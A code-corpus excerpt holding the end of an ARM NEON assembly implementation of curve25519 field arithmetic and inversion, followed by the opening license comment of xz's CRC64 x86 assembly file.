vadd.i64 q2,q2,q6
vshl.i64 q6,q6,#26
vadd.i64 q10,q2,q4
vsub.i64 q5,q12,q5
vshr.s64 q8,q8,#25
vsub.i64 q6,q15,q6
vshr.s64 q10,q10,#25
vadd.i64 q12,q13,q8
vshl.i64 q8,q8,#25
vadd.i64 q13,q12,q9
vadd.i64 q0,q0,q10
vsub.i64 q7,q7,q8
vshr.s64 q8,q13,#26
vshl.i64 q10,q10,#25
vadd.i64 q13,q0,q9
vadd.i64 q1,q1,q8
vshl.i64 q8,q8,#26
vadd.i64 q15,q1,q4
vsub.i64 q2,q2,q10
vshr.s64 q10,q13,#26
vsub.i64 q8,q12,q8
vshr.s64 q12,q15,#25
vadd.i64 q3,q3,q10
vshl.i64 q10,q10,#26
vadd.i64 q13,q3,q4
vadd.i64 q14,q14,q12
add r2,r3,#144
vshl.i64 q12,q12,#25
add r4,r3,#192
vadd.i64 q15,q14,q9
add r2,r2,#8
vsub.i64 q0,q0,q10
add r4,r4,#8
vshr.s64 q10,q13,#25
vsub.i64 q1,q1,q12
vshr.s64 q12,q15,#26
vadd.i64 q13,q10,q10
vadd.i64 q11,q11,q12
vtrn.32 d16,d2
vshl.i64 q12,q12,#26
vtrn.32 d17,d3
vadd.i64 q1,q11,q4
vadd.i64 q4,q5,q13
vst1.8 d16,[r2,: 64]!
vshl.i64 q5,q10,#4
vst1.8 d17,[r4,: 64]!
vsub.i64 q8,q14,q12
vshr.s64 q1,q1,#25
vadd.i64 q4,q4,q5
vadd.i64 q5,q6,q1
vshl.i64 q1,q1,#25
vadd.i64 q6,q5,q9
vadd.i64 q4,q4,q10
vshl.i64 q10,q10,#25
vadd.i64 q9,q4,q9
vsub.i64 q1,q11,q1
vshr.s64 q6,q6,#26
vsub.i64 q3,q3,q10
vtrn.32 d16,d2
vshr.s64 q9,q9,#26
vtrn.32 d17,d3
vadd.i64 q1,q2,q6
vst1.8 d16,[r2,: 64]
vshl.i64 q2,q6,#26
vst1.8 d17,[r4,: 64]
vadd.i64 q6,q7,q9
vtrn.32 d0,d6
vshl.i64 q7,q9,#26
vtrn.32 d1,d7
vsub.i64 q2,q5,q2
add r2,r2,#16
vsub.i64 q3,q4,q7
vst1.8 d0,[r2,: 64]
add r4,r4,#16
vst1.8 d1,[r4,: 64]
vtrn.32 d4,d2
vtrn.32 d5,d3
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d6,d12
vtrn.32 d7,d13
vst1.8 d4,[r2,: 64]
vst1.8 d5,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d6,[r2,: 64]
vst1.8 d7,[r4,: 64]
add r2,r3,#336
add r4,r3,#288
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vadd.i32 q0,q0,q1
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4-d5},[r4,: 128]!
vadd.i32 q1,q1,q2
add r5,r3,#288
vld1.8 {d4},[r2,: 64]
vld1.8 {d6},[r4,: 64]
vadd.i32 q2,q2,q3
vst1.8 {d0-d1},[r5,: 128]!
vst1.8 {d2-d3},[r5,: 128]!
vst1.8 d4,[r5,: 64]
add r2,r3,#48
add r4,r3,#144
vld1.8 {d0-d1},[r4,: 128]!
vld1.8 {d2-d3},[r4,: 128]!
vld1.8 {d4},[r4,: 64]
add r4,r3,#288
vld1.8 {d6-d7},[r4,: 128]!
vtrn.32 q0,q3
vld1.8 {d8-d9},[r4,: 128]!
vshl.i32 q5,q0,#4
vtrn.32 q1,q4
vshl.i32 q6,q3,#4
vadd.i32 q5,q5,q0
vadd.i32 q6,q6,q3
vshl.i32 q7,q1,#4
vld1.8 {d5},[r4,: 64]
vshl.i32 q8,q4,#4
vtrn.32 d4,d5
vadd.i32 q7,q7,q1
vadd.i32 q8,q8,q4
vld1.8 {d18-d19},[r2,: 128]!
vshl.i32 q10,q2,#4
vld1.8 {d22-d23},[r2,: 128]!
vadd.i32 q10,q10,q2
vld1.8 {d24},[r2,: 64]
vadd.i32 q5,q5,q0
add r2,r3,#240
vld1.8 {d26-d27},[r2,: 128]!
vadd.i32 q6,q6,q3
vld1.8 {d28-d29},[r2,: 128]!
vadd.i32 q8,q8,q4
vld1.8 {d25},[r2,: 64]
vadd.i32 q10,q10,q2
vtrn.32 q9,q13
vadd.i32 q7,q7,q1
vadd.i32 q5,q5,q0
vtrn.32 q11,q14
vadd.i32 q6,q6,q3
add r2,sp,#560
vadd.i32 q10,q10,q2
vtrn.32 d24,d25
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q6,q13,#1
add r2,sp,#576
vst1.8 {d20-d21},[r2,: 128]
vshl.i32 q10,q14,#1
add r2,sp,#592
vst1.8 {d12-d13},[r2,: 128]
vshl.i32 q15,q12,#1
vadd.i32 q8,q8,q4
vext.32 d10,d31,d30,#0
vadd.i32 q7,q7,q1
add r2,sp,#608
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q8,d18,d5
vmlal.s32 q8,d26,d4
vmlal.s32 q8,d19,d9
vmlal.s32 q8,d27,d3
vmlal.s32 q8,d22,d8
vmlal.s32 q8,d28,d2
vmlal.s32 q8,d23,d7
vmlal.s32 q8,d29,d1
vmlal.s32 q8,d24,d6
vmlal.s32 q8,d25,d0
add r2,sp,#624
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q2,d18,d4
vmlal.s32 q2,d12,d9
vmlal.s32 q2,d13,d8
vmlal.s32 q2,d19,d3
vmlal.s32 q2,d22,d2
vmlal.s32 q2,d23,d1
vmlal.s32 q2,d24,d0
add r2,sp,#640
vst1.8 {d20-d21},[r2,: 128]
vmull.s32 q7,d18,d9
vmlal.s32 q7,d26,d3
vmlal.s32 q7,d19,d8
vmlal.s32 q7,d27,d2
vmlal.s32 q7,d22,d7
vmlal.s32 q7,d28,d1
vmlal.s32 q7,d23,d6
vmlal.s32 q7,d29,d0
add r2,sp,#656
vst1.8 {d10-d11},[r2,: 128]
vmull.s32 q5,d18,d3
vmlal.s32 q5,d19,d2
vmlal.s32 q5,d22,d1
vmlal.s32 q5,d23,d0
vmlal.s32 q5,d12,d8
add r2,sp,#672
vst1.8 {d16-d17},[r2,: 128]
vmull.s32 q4,d18,d8
vmlal.s32 q4,d26,d2
vmlal.s32 q4,d19,d7
vmlal.s32 q4,d27,d1
vmlal.s32 q4,d22,d6
vmlal.s32 q4,d28,d0
vmull.s32 q8,d18,d7
vmlal.s32 q8,d26,d1
vmlal.s32 q8,d19,d6
vmlal.s32 q8,d27,d0
add r2,sp,#576
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q7,d24,d21
vmlal.s32 q7,d25,d20
vmlal.s32 q4,d23,d21
vmlal.s32 q4,d29,d20
vmlal.s32 q8,d22,d21
vmlal.s32 q8,d28,d20
vmlal.s32 q5,d24,d20
add r2,sp,#576
vst1.8 {d14-d15},[r2,: 128]
vmull.s32 q7,d18,d6
vmlal.s32 q7,d26,d0
add r2,sp,#656
vld1.8 {d30-d31},[r2,: 128]
vmlal.s32 q2,d30,d21
vmlal.s32 q7,d19,d21
vmlal.s32 q7,d27,d20
add r2,sp,#624
vld1.8 {d26-d27},[r2,: 128]
vmlal.s32 q4,d25,d27
vmlal.s32 q8,d29,d27
vmlal.s32 q8,d25,d26
vmlal.s32 q7,d28,d27
vmlal.s32 q7,d29,d26
add r2,sp,#608
vld1.8 {d28-d29},[r2,: 128]
vmlal.s32 q4,d24,d29
vmlal.s32 q8,d23,d29
vmlal.s32 q8,d24,d28
vmlal.s32 q7,d22,d29
vmlal.s32 q7,d23,d28
add r2,sp,#608
vst1.8 {d8-d9},[r2,: 128]
add r2,sp,#560
vld1.8 {d8-d9},[r2,: 128]
vmlal.s32 q7,d24,d9
vmlal.s32 q7,d25,d31
vmull.s32 q1,d18,d2
vmlal.s32 q1,d19,d1
vmlal.s32 q1,d22,d0
vmlal.s32 q1,d24,d27
vmlal.s32 q1,d23,d20
vmlal.s32 q1,d12,d7
vmlal.s32 q1,d13,d6
vmull.s32 q6,d18,d1
vmlal.s32 q6,d19,d0
vmlal.s32 q6,d23,d27
vmlal.s32 q6,d22,d20
vmlal.s32 q6,d24,d26
vmull.s32 q0,d18,d0
vmlal.s32 q0,d22,d27
vmlal.s32 q0,d23,d26
vmlal.s32 q0,d24,d31
vmlal.s32 q0,d19,d20
add r2,sp,#640
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q2,d18,d7
vmlal.s32 q2,d19,d6
vmlal.s32 q5,d18,d6
vmlal.s32 q5,d19,d21
vmlal.s32 q1,d18,d21
vmlal.s32 q1,d19,d29
vmlal.s32 q0,d18,d28
vmlal.s32 q0,d19,d9
vmlal.s32 q6,d18,d29
vmlal.s32 q6,d19,d28
add r2,sp,#592
vld1.8 {d18-d19},[r2,: 128]
add r2,sp,#512
vld1.8 {d22-d23},[r2,: 128]
vmlal.s32 q5,d19,d7
vmlal.s32 q0,d18,d21
vmlal.s32 q0,d19,d29
vmlal.s32 q6,d18,d6
add r2,sp,#528
vld1.8 {d6-d7},[r2,: 128]
vmlal.s32 q6,d19,d21
add r2,sp,#576
vld1.8 {d18-d19},[r2,: 128]
vmlal.s32 q0,d30,d8
add r2,sp,#672
vld1.8 {d20-d21},[r2,: 128]
vmlal.s32 q5,d30,d29
add r2,sp,#608
vld1.8 {d24-d25},[r2,: 128]
vmlal.s32 q1,d30,d28
vadd.i64 q13,q0,q11
vadd.i64 q14,q5,q11
vmlal.s32 q6,d30,d9
vshr.s64 q4,q13,#26
vshr.s64 q13,q14,#26
vadd.i64 q7,q7,q4
vshl.i64 q4,q4,#26
vadd.i64 q14,q7,q3
vadd.i64 q9,q9,q13
vshl.i64 q13,q13,#26
vadd.i64 q15,q9,q3
vsub.i64 q0,q0,q4
vshr.s64 q4,q14,#25
vsub.i64 q5,q5,q13
vshr.s64 q13,q15,#25
vadd.i64 q6,q6,q4
vshl.i64 q4,q4,#25
vadd.i64 q14,q6,q11
vadd.i64 q2,q2,q13
vsub.i64 q4,q7,q4
vshr.s64 q7,q14,#26
vshl.i64 q13,q13,#25
vadd.i64 q14,q2,q11
vadd.i64 q8,q8,q7
vshl.i64 q7,q7,#26
vadd.i64 q15,q8,q3
vsub.i64 q9,q9,q13
vshr.s64 q13,q14,#26
vsub.i64 q6,q6,q7
vshr.s64 q7,q15,#25
vadd.i64 q10,q10,q13
vshl.i64 q13,q13,#26
vadd.i64 q14,q10,q3
vadd.i64 q1,q1,q7
add r2,r3,#240
vshl.i64 q7,q7,#25
add r4,r3,#144
vadd.i64 q15,q1,q11
add r2,r2,#8
vsub.i64 q2,q2,q13
add r4,r4,#8
vshr.s64 q13,q14,#25
vsub.i64 q7,q8,q7
vshr.s64 q8,q15,#26
vadd.i64 q14,q13,q13
vadd.i64 q12,q12,q8
vtrn.32 d12,d14
vshl.i64 q8,q8,#26
vtrn.32 d13,d15
vadd.i64 q3,q12,q3
vadd.i64 q0,q0,q14
vst1.8 d12,[r2,: 64]!
vshl.i64 q7,q13,#4
vst1.8 d13,[r4,: 64]!
vsub.i64 q1,q1,q8
vshr.s64 q3,q3,#25
vadd.i64 q0,q0,q7
vadd.i64 q5,q5,q3
vshl.i64 q3,q3,#25
vadd.i64 q6,q5,q11
vadd.i64 q0,q0,q13
vshl.i64 q7,q13,#25
vadd.i64 q8,q0,q11
vsub.i64 q3,q12,q3
vshr.s64 q6,q6,#26
vsub.i64 q7,q10,q7
vtrn.32 d2,d6
vshr.s64 q8,q8,#26
vtrn.32 d3,d7
vadd.i64 q3,q9,q6
vst1.8 d2,[r2,: 64]
vshl.i64 q6,q6,#26
vst1.8 d3,[r4,: 64]
vadd.i64 q1,q4,q8
vtrn.32 d4,d14
vshl.i64 q4,q8,#26
vtrn.32 d5,d15
vsub.i64 q5,q5,q6
add r2,r2,#16
vsub.i64 q0,q0,q4
vst1.8 d4,[r2,: 64]
add r4,r4,#16
vst1.8 d5,[r4,: 64]
vtrn.32 d10,d6
vtrn.32 d11,d7
sub r2,r2,#8
sub r4,r4,#8
vtrn.32 d0,d2
vtrn.32 d1,d3
vst1.8 d10,[r2,: 64]
vst1.8 d11,[r4,: 64]
sub r2,r2,#24
sub r4,r4,#24
vst1.8 d0,[r2,: 64]
vst1.8 d1,[r4,: 64]
ldr r2,[sp,#488]
ldr r4,[sp,#492]
subs r5,r2,#1
bge ._mainloop
add r1,r3,#144
add r2,r3,#336
vld1.8 {d0-d1},[r1,: 128]!
vld1.8 {d2-d3},[r1,: 128]!
vld1.8 {d4},[r1,: 64]
vst1.8 {d0-d1},[r2,: 128]!
vst1.8 {d2-d3},[r2,: 128]!
vst1.8 d4,[r2,: 64]
ldr r1,=0
._invertloop:
add r2,r3,#144
ldr r4,=0
ldr r5,=2
cmp r1,#1
ldreq r5,=1
addeq r2,r3,#336
addeq r4,r3,#48
cmp r1,#2
ldreq r5,=1
addeq r2,r3,#48
cmp r1,#3
ldreq r5,=5
addeq r4,r3,#336
cmp r1,#4
ldreq r5,=10
cmp r1,#5
ldreq r5,=20
cmp r1,#6
ldreq r5,=10
addeq r2,r3,#336
addeq r4,r3,#336
cmp r1,#7
ldreq r5,=50
cmp r1,#8
ldreq r5,=100
cmp r1,#9
ldreq r5,=50
addeq r2,r3,#336
cmp r1,#10
ldreq r5,=5
addeq r2,r3,#48
cmp r1,#11
ldreq r5,=0
addeq r2,r3,#96
add r6,r3,#144
add r7,r3,#288
vld1.8 {d0-d1},[r6,: 128]!
vld1.8 {d2-d3},[r6,: 128]!
vld1.8 {d4},[r6,: 64]
vst1.8 {d0-d1},[r7,: 128]!
vst1.8 {d2-d3},[r7,: 128]!
vst1.8 d4,[r7,: 64]
cmp r5,#0
beq ._skipsquaringloop
._squaringloop:
add r6,r3,#288
add r7,r3,#288
add r8,r3,#288
vmov.i32 q0,#19
vmov.i32 q1,#0
vmov.i32 q2,#1
vzip.i32 q1,q2
vld1.8 {d4-d5},[r7,: 128]!
vld1.8 {d6-d7},[r7,: 128]!
vld1.8 {d9},[r7,: 64]
vld1.8 {d10-d11},[r6,: 128]!
add r7,sp,#416
vld1.8 {d12-d13},[r6,: 128]!
vmul.i32 q7,q2,q0
vld1.8 {d8},[r6,: 64]
vext.32 d17,d11,d10,#1
vmul.i32 q9,q3,q0
vext.32 d16,d10,d8,#1
vshl.u32 q10,q5,q1
vext.32 d22,d14,d4,#1
vext.32 d24,d18,d6,#1
vshl.u32 q13,q6,q1
vshl.u32 d28,d8,d2
vrev64.i32 d22,d22
vmul.i32 d1,d9,d1
vrev64.i32 d24,d24
vext.32 d29,d8,d13,#1
vext.32 d0,d1,d9,#1
vrev64.i32 d0,d0
vext.32 d2,d9,d1,#1
vext.32 d23,d15,d5,#1
vmull.s32 q4,d20,d4
vrev64.i32 d23,d23
vmlal.s32 q4,d21,d1
vrev64.i32 d2,d2
vmlal.s32 q4,d26,d19
vext.32 d3,d5,d15,#1
vmlal.s32 q4,d27,d18
vrev64.i32 d3,d3
vmlal.s32 q4,d28,d15
vext.32 d14,d12,d11,#1
vmull.s32 q5,d16,d23
vext.32 d15,d13,d12,#1
vmlal.s32 q5,d17,d4
vst1.8 d8,[r7,: 64]!
vmlal.s32 q5,d14,d1
vext.32 d12,d9,d8,#0
vmlal.s32 q5,d15,d19
vmov.i64 d13,#0
vmlal.s32 q5,d29,d18
vext.32 d25,d19,d7,#1
vmlal.s32 q6,d20,d5
vrev64.i32 d25,d25
vmlal.s32 q6,d21,d4
vst1.8 d11,[r7,: 64]!
vmlal.s32 q6,d26,d1
vext.32 d9,d10,d10,#0
vmlal.s32 q6,d27,d19
vmov.i64 d8,#0
vmlal.s32 q6,d28,d18
vmlal.s32 q4,d16,d24
vmlal.s32 q4,d17,d5
vmlal.s32 q4,d14,d4
vst1.8 d12,[r7,: 64]!
vmlal.s32 q4,d15,d1
vext.32 d10,d13,d12,#0
vmlal.s32 q4,d29,d19
vmov.i64 d11,#0
vmlal.s32 q5,d20,d6
vmlal.s32 q5,d21,d5
vmlal.s32 q5,d26,d4
vext.32 d13,d8,d8,#0
vmlal.s32 q5,d27,d1
vmov.i64 d12,#0
vmlal.s32 q5,d28,d19
vst1.8 d9,[r7,: 64]!
vmlal.s32 q6,d16,d25
vmlal.s32 q6,d17,d6
vst1.8 d10,[r7,: 64]
vmlal.s32 q6,d14,d5
vext.32 d8,d11,d10,#0
vmlal.s32 q6,d15,d4
vmov.i64 d9,#0
vmlal.s32 q6,d29,d1
vmlal.s32 q4,d20,d7
vmlal.s32 q4,d21,d6
vmlal.s32 q4,d26,d5
vext.32 d11,d12,d12,#0
vmlal.s32 q4,d27,d4
vmov.i64 d10,#0
vmlal.s32 q4,d28,d1
vmlal.s32 q5,d16,d0
sub r6,r7,#32
vmlal.s32 q5,d17,d7
vmlal.s32 q5,d14,d6
vext.32 d30,d9,d8,#0
vmlal.s32 q5,d15,d5
vld1.8 {d31},[r6,: 64]!
vmlal.s32 q5,d29,d4
vmlal.s32 q15,d20,d0
vext.32 d0,d6,d18,#1
vmlal.s32 q15,d21,d25
vrev64.i32 d0,d0
vmlal.s32 q15,d26,d24
vext.32 d1,d7,d19,#1
vext.32 d7,d10,d10,#0
vmlal.s32 q15,d27,d23
vrev64.i32 d1,d1
vld1.8 {d6},[r6,: 64]
vmlal.s32 q15,d28,d22
vmlal.s32 q3,d16,d4
add r6,r6,#24
vmlal.s32 q3,d17,d2
vext.32 d4,d31,d30,#0
vmov d17,d11
vmlal.s32 q3,d14,d1
vext.32 d11,d13,d13,#0
vext.32 d13,d30,d30,#0
vmlal.s32 q3,d15,d0
vext.32 d1,d8,d8,#0
vmlal.s32 q3,d29,d3
vld1.8 {d5},[r6,: 64]
sub r6,r6,#16
vext.32 d10,d6,d6,#0
vmov.i32 q1,#0xffffffff
vshl.i64 q4,q1,#25
add r7,sp,#512
vld1.8 {d14-d15},[r7,: 128]
vadd.i64 q9,q2,q7
vshl.i64 q1,q1,#26
vshr.s64 q10,q9,#26
vld1.8 {d0},[r6,: 64]!
vadd.i64 q5,q5,q10
vand q9,q9,q1
vld1.8 {d16},[r6,: 64]!
add r6,sp,#528
vld1.8 {d20-d21},[r6,: 128]
vadd.i64 q11,q5,q10
vsub.i64 q2,q2,q9
vshr.s64 q9,q11,#25
vext.32 d12,d5,d4,#0
vand q11,q11,q4
vadd.i64 q0,q0,q9
vmov d19,d7
vadd.i64 q3,q0,q7
vsub.i64 q5,q5,q11
vshr.s64 q11,q3,#26
vext.32 d18,d11,d10,#0
vand q3,q3,q1
vadd.i64 q8,q8,q11
vadd.i64 q11,q8,q10
vsub.i64 q0,q0,q3
vshr.s64 q3,q11,#25
vand q11,q11,q4
vadd.i64 q3,q6,q3
vadd.i64 q6,q3,q7
vsub.i64 q8,q8,q11
vshr.s64 q11,q6,#26
vand q6,q6,q1
vadd.i64 q9,q9,q11
vadd.i64 d25,d19,d21
vsub.i64 q3,q3,q6
vshr.s64 d23,d25,#25
vand q4,q12,q4
vadd.i64 d21,d23,d23
vshl.i64 d25,d23,#4
vadd.i64 d21,d21,d23
vadd.i64 d25,d25,d21
vadd.i64 d4,d4,d25
vzip.i32 q0,q8
vadd.i64 d12,d4,d14
add r6,r8,#8
vst1.8 d0,[r6,: 64]
vsub.i64 d19,d19,d9
add r6,r6,#16
vst1.8 d16,[r6,: 64]
vshr.s64 d22,d12,#26
vand q0,q6,q1
vadd.i64 d10,d10,d22
vzip.i32 q3,q9
vsub.i64 d4,d4,d0
sub r6,r6,#8
vst1.8 d6,[r6,: 64]
add r6,r6,#16
vst1.8 d18,[r6,: 64]
vzip.i32 q2,q5
sub r6,r6,#32
vst1.8 d4,[r6,: 64]
subs r5,r5,#1
bhi ._squaringloop
._skipsquaringloop:
mov r2,r2
add r5,r3,#288
add r6,r3,#144
vmov.i32 q0,#19
vmov.i32 q1,#0
vmov.i32 q2,#1
vzip.i32 q1,q2
vld1.8 {d4-d5},[r5,: 128]!
vld1.8 {d6-d7},[r5,: 128]!
vld1.8 {d9},[r5,: 64]
vld1.8 {d10-d11},[r2,: 128]!
add r5,sp,#416
vld1.8 {d12-d13},[r2,: 128]!
vmul.i32 q7,q2,q0
vld1.8 {d8},[r2,: 64]
vext.32 d17,d11,d10,#1
vmul.i32 q9,q3,q0
vext.32 d16,d10,d8,#1
vshl.u32 q10,q5,q1
vext.32 d22,d14,d4,#1
vext.32 d24,d18,d6,#1
vshl.u32 q13,q6,q1
vshl.u32 d28,d8,d2
vrev64.i32 d22,d22
vmul.i32 d1,d9,d1
vrev64.i32 d24,d24
vext.32 d29,d8,d13,#1
vext.32 d0,d1,d9,#1
vrev64.i32 d0,d0
vext.32 d2,d9,d1,#1
vext.32 d23,d15,d5,#1
vmull.s32 q4,d20,d4
vrev64.i32 d23,d23
vmlal.s32 q4,d21,d1
vrev64.i32 d2,d2
vmlal.s32 q4,d26,d19
vext.32 d3,d5,d15,#1
vmlal.s32 q4,d27,d18
vrev64.i32 d3,d3
vmlal.s32 q4,d28,d15
vext.32 d14,d12,d11,#1
vmull.s32 q5,d16,d23
vext.32 d15,d13,d12,#1
vmlal.s32 q5,d17,d4
vst1.8 d8,[r5,: 64]!
vmlal.s32 q5,d14,d1
vext.32 d12,d9,d8,#0
vmlal.s32 q5,d15,d19
vmov.i64 d13,#0
vmlal.s32 q5,d29,d18
vext.32 d25,d19,d7,#1
vmlal.s32 q6,d20,d5
vrev64.i32 d25,d25
vmlal.s32 q6,d21,d4
vst1.8 d11,[r5,: 64]!
vmlal.s32 q6,d26,d1
vext.32 d9,d10,d10,#0
vmlal.s32 q6,d27,d19
vmov.i64 d8,#0
vmlal.s32 q6,d28,d18
vmlal.s32 q4,d16,d24
vmlal.s32 q4,d17,d5
vmlal.s32 q4,d14,d4
vst1.8 d12,[r5,: 64]!
vmlal.s32 q4,d15,d1
vext.32 d10,d13,d12,#0
vmlal.s32 q4,d29,d19
vmov.i64 d11,#0
vmlal.s32 q5,d20,d6
vmlal.s32 q5,d21,d5
vmlal.s32 q5,d26,d4
vext.32 d13,d8,d8,#0
vmlal.s32 q5,d27,d1
vmov.i64 d12,#0
vmlal.s32 q5,d28,d19
vst1.8 d9,[r5,: 64]!
vmlal.s32 q6,d16,d25
vmlal.s32 q6,d17,d6
vst1.8 d10,[r5,: 64]
vmlal.s32 q6,d14,d5
vext.32 d8,d11,d10,#0
vmlal.s32 q6,d15,d4
vmov.i64 d9,#0
vmlal.s32 q6,d29,d1
vmlal.s32 q4,d20,d7
vmlal.s32 q4,d21,d6
vmlal.s32 q4,d26,d5
vext.32 d11,d12,d12,#0
vmlal.s32 q4,d27,d4
vmov.i64 d10,#0
vmlal.s32 q4,d28,d1
vmlal.s32 q5,d16,d0
sub r2,r5,#32
vmlal.s32 q5,d17,d7
vmlal.s32 q5,d14,d6
vext.32 d30,d9,d8,#0
vmlal.s32 q5,d15,d5
vld1.8 {d31},[r2,: 64]!
vmlal.s32 q5,d29,d4
vmlal.s32 q15,d20,d0
vext.32 d0,d6,d18,#1
vmlal.s32 q15,d21,d25
vrev64.i32 d0,d0
vmlal.s32 q15,d26,d24
vext.32 d1,d7,d19,#1
vext.32 d7,d10,d10,#0
vmlal.s32 q15,d27,d23
vrev64.i32 d1,d1
vld1.8 {d6},[r2,: 64]
vmlal.s32 q15,d28,d22
vmlal.s32 q3,d16,d4
add r2,r2,#24
vmlal.s32 q3,d17,d2
vext.32 d4,d31,d30,#0
vmov d17,d11
vmlal.s32 q3,d14,d1
vext.32 d11,d13,d13,#0
vext.32 d13,d30,d30,#0
vmlal.s32 q3,d15,d0
vext.32 d1,d8,d8,#0
vmlal.s32 q3,d29,d3
vld1.8 {d5},[r2,: 64]
sub r2,r2,#16
vext.32 d10,d6,d6,#0
vmov.i32 q1,#0xffffffff
vshl.i64 q4,q1,#25
add r5,sp,#512
vld1.8 {d14-d15},[r5,: 128]
vadd.i64 q9,q2,q7
vshl.i64 q1,q1,#26
vshr.s64 q10,q9,#26
vld1.8 {d0},[r2,: 64]!
vadd.i64 q5,q5,q10
vand q9,q9,q1
vld1.8 {d16},[r2,: 64]!
add r2,sp,#528
vld1.8 {d20-d21},[r2,: 128]
vadd.i64 q11,q5,q10
vsub.i64 q2,q2,q9
vshr.s64 q9,q11,#25
vext.32 d12,d5,d4,#0
vand q11,q11,q4
vadd.i64 q0,q0,q9
vmov d19,d7
vadd.i64 q3,q0,q7
vsub.i64 q5,q5,q11
vshr.s64 q11,q3,#26
vext.32 d18,d11,d10,#0
vand q3,q3,q1
vadd.i64 q8,q8,q11
vadd.i64 q11,q8,q10
vsub.i64 q0,q0,q3
vshr.s64 q3,q11,#25
vand q11,q11,q4
vadd.i64 q3,q6,q3
vadd.i64 q6,q3,q7
vsub.i64 q8,q8,q11
vshr.s64 q11,q6,#26
vand q6,q6,q1
vadd.i64 q9,q9,q11
vadd.i64 d25,d19,d21
vsub.i64 q3,q3,q6
vshr.s64 d23,d25,#25
vand q4,q12,q4
vadd.i64 d21,d23,d23
vshl.i64 d25,d23,#4
vadd.i64 d21,d21,d23
vadd.i64 d25,d25,d21
vadd.i64 d4,d4,d25
vzip.i32 q0,q8
vadd.i64 d12,d4,d14
add r2,r6,#8
vst1.8 d0,[r2,: 64]
vsub.i64 d19,d19,d9
add r2,r2,#16
vst1.8 d16,[r2,: 64]
vshr.s64 d22,d12,#26
vand q0,q6,q1
vadd.i64 d10,d10,d22
vzip.i32 q3,q9
vsub.i64 d4,d4,d0
sub r2,r2,#8
vst1.8 d6,[r2,: 64]
add r2,r2,#16
vst1.8 d18,[r2,: 64]
vzip.i32 q2,q5
sub r2,r2,#32
vst1.8 d4,[r2,: 64]
cmp r4,#0
beq ._skippostcopy
add r2,r3,#144
mov r4,r4
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4},[r2,: 64]
vst1.8 {d0-d1},[r4,: 128]!
vst1.8 {d2-d3},[r4,: 128]!
vst1.8 d4,[r4,: 64]
._skippostcopy:
cmp r1,#1
bne ._skipfinalcopy
add r2,r3,#288
add r4,r3,#144
vld1.8 {d0-d1},[r2,: 128]!
vld1.8 {d2-d3},[r2,: 128]!
vld1.8 {d4},[r2,: 64]
vst1.8 {d0-d1},[r4,: 128]!
vst1.8 {d2-d3},[r4,: 128]!
vst1.8 d4,[r4,: 64]
._skipfinalcopy:
add r1,r1,#1
cmp r1,#12
blo ._invertloop
add r1,r3,#144
ldr r2,[r1],#4
ldr r3,[r1],#4
ldr r4,[r1],#4
ldr r5,[r1],#4
ldr r6,[r1],#4
ldr r7,[r1],#4
ldr r8,[r1],#4
ldr r9,[r1],#4
ldr r10,[r1],#4
ldr r1,[r1]
add r11,r1,r1,LSL #4
add r11,r11,r1,LSL #1
add r11,r11,#16777216
mov r11,r11,ASR #25
add r11,r11,r2
mov r11,r11,ASR #26
add r11,r11,r3
mov r11,r11,ASR #25
add r11,r11,r4
mov r11,r11,ASR #26
add r11,r11,r5
mov r11,r11,ASR #25
add r11,r11,r6
mov r11,r11,ASR #26
add r11,r11,r7
mov r11,r11,ASR #25
add r11,r11,r8
mov r11,r11,ASR #26
add r11,r11,r9
mov r11,r11,ASR #25
add r11,r11,r10
mov r11,r11,ASR #26
add r11,r11,r1
mov r11,r11,ASR #25
add r2,r2,r11
add r2,r2,r11,LSL #1
add r2,r2,r11,LSL #4
mov r11,r2,ASR #26
add r3,r3,r11
sub r2,r2,r11,LSL #26
mov r11,r3,ASR #25
add r4,r4,r11
sub r3,r3,r11,LSL #25
mov r11,r4,ASR #26
add r5,r5,r11
sub r4,r4,r11,LSL #26
mov r11,r5,ASR #25
add r6,r6,r11
sub r5,r5,r11,LSL #25
mov r11,r6,ASR #26
add r7,r7,r11
sub r6,r6,r11,LSL #26
mov r11,r7,ASR #25
add r8,r8,r11
sub r7,r7,r11,LSL #25
mov r11,r8,ASR #26
add r9,r9,r11
sub r8,r8,r11,LSL #26
mov r11,r9,ASR #25
add r10,r10,r11
sub r9,r9,r11,LSL #25
mov r11,r10,ASR #26
add r1,r1,r11
sub r10,r10,r11,LSL #26
mov r11,r1,ASR #25
sub r1,r1,r11,LSL #25
add r2,r2,r3,LSL #26
mov r3,r3,LSR #6
add r3,r3,r4,LSL #19
mov r4,r4,LSR #13
add r4,r4,r5,LSL #13
mov r5,r5,LSR #19
add r5,r5,r6,LSL #6
add r6,r7,r8,LSL #25
mov r7,r8,LSR #7
add r7,r7,r9,LSL #19
mov r8,r9,LSR #13
add r8,r8,r10,LSL #12
mov r9,r10,LSR #20
add r1,r9,r1,LSL #6
str r2,[r0],#4
str r3,[r0],#4
str r4,[r0],#4
str r5,[r0],#4
str r6,[r0],#4
str r7,[r0],#4
str r8,[r0],#4
str r1,[r0]
ldrd r4,[sp,#0]
ldrd r6,[sp,#8]
ldrd r8,[sp,#16]
ldrd r10,[sp,#24]
ldr r12,[sp,#480]
ldr r14,[sp,#484]
ldr r0,=0
mov sp,r12
vpop {q4,q5,q6,q7}
bx lr
#endif /* !OPENSSL_NO_ASM && OPENSSL_ARM && __ELF__ */
|
mi2bjss/Pressel-site | 6,761 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/lzma-sys-0.1.20/xz-5.2/src/liblzma/check/crc64_x86.S | /*
* Speed-optimized CRC64 using slicing-by-four algorithm
*
* This uses only i386 instructions, but it is optimized for i686 and later
* (including e.g. Pentium II/III/IV, Athlon XP, and Core 2).
*
* Authors: Igor Pavlov (original CRC32 assembly code)
* Lasse Collin (CRC64 adaptation of the modified CRC32 code)
*
* This file has been put into the public domain.
* You can do whatever you want with this file.
*
* This code needs lzma_crc64_table, which can be created using the
* following C code:
uint64_t lzma_crc64_table[4][256];
void
init_table(void)
{
